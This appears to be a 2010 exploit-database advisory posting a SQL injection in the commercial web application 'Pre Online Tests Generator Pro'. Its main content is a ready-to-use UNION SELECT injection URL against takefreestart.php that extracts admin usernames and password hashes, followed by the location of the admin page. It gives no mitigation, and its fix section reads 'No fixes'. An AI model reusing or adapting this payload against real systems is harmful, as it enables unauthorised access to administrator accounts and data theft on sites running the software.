Pre Online Tests Generator Pro SQL Injection Vulnerability

2010-11-14 09:16:22

In The Name Of GOD
[+] Exploit Title: Pre Online Tests Generator Pro SQL Injection Vulnerability
[+] Date: 2010-11-13
[+] Author : Cru3l.b0y
[+] Software Link: http://www.preproject.com/preexampro.asp
[+] Price : 95.00$
[+] Contact : [email protected]
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :

http://target/path/takefreestart.php?tid=242&tid2=-1+union+select+1,2,3,group_concat(user_name,0x3a,user_pass),5,6,7,8+from+admin--&nxtq=true&q_no=1

[+] Admin Page: /admin



Fixes

No fixes

In order to submit a new fix you need to be registered.